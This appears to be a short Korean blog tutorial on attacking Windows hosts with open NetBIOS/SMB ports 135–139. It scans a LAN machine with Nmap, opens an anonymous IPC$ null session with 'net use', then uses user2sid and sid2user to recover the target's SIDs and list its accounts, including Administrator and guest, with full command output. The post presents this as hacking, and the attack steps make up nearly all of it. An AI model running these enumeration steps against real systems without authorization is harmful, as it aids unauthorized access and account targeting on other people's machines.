OPEN PORT 139,138,136,135 AND HACKING

설치(Windows)

  • 먼저 아래의 툴을 다운로드 받는다.
  • USER2SID & SID2USER
  • NetBios Auditing Tool


 

사용 방법

  • Nmap Tool 을 사용하여 Port Scanning 을 합니다.( ‘Nmap 설치 가이드를 참조하세요.)
  • 대상 PC 192.168.0.XX 에서 139번 포트가 열린 것이 확인됩니다.
  • 다운로드한 파일을 C: 드라이브에 풀어놓습니다.
  • cmd 창을 열어 현재 연결 상태를 확인하겠습니다.
    C:UsersAdminstrator>net use
    새 연결 정보가 저장됩니다.
    목록에 항목이 없습니다.
  • 대상 컴퓨터로 연결해 보겠습니다.
    C:UsersAdminstrator>net use 192.168.0.57ipc$ ” /user:””
    명령을 잘 실행했습니다.
    C:UsersAdminstrator>net use

    새 연결 정보가 저장됩니다.
    상태 로컬 원격 네트워크
    ——————————————————————————-

    OK 192.168.0.57ipc$ Microsoft Windows Network
    명령을 잘 실행했습니다.
  • User2sid.exe 활용
    C:sid>user2sid.exe 192.168.0.57 guest
    S-1-5-21-1401972913-3070510042-2977727395-501 –—> (sid 
    값 확인)
    Number of subauthorities is 5
    Domain is 
    WIN8057
    Length of SID in memory is 28 bytes
    Type of SID is SidTypeUser
  • sid2user.exe 활용
    C:sid>sid2user 192.168.0.57 5 21 1401972913 3070510042 2977727395 500
    Name is Administrator (
    위의 sid값을 카피하여 적용)
    Domain is 
    WIN8057
    Type of SID is SidTypeUser
  • 스캔 정보
    컴퓨터 이름 : WIN8057
    500 : Administrator
    501 : guest
    1000~ : 
    모든 사용자 계정을 확인할 수 있다.

 

 

 

PLURA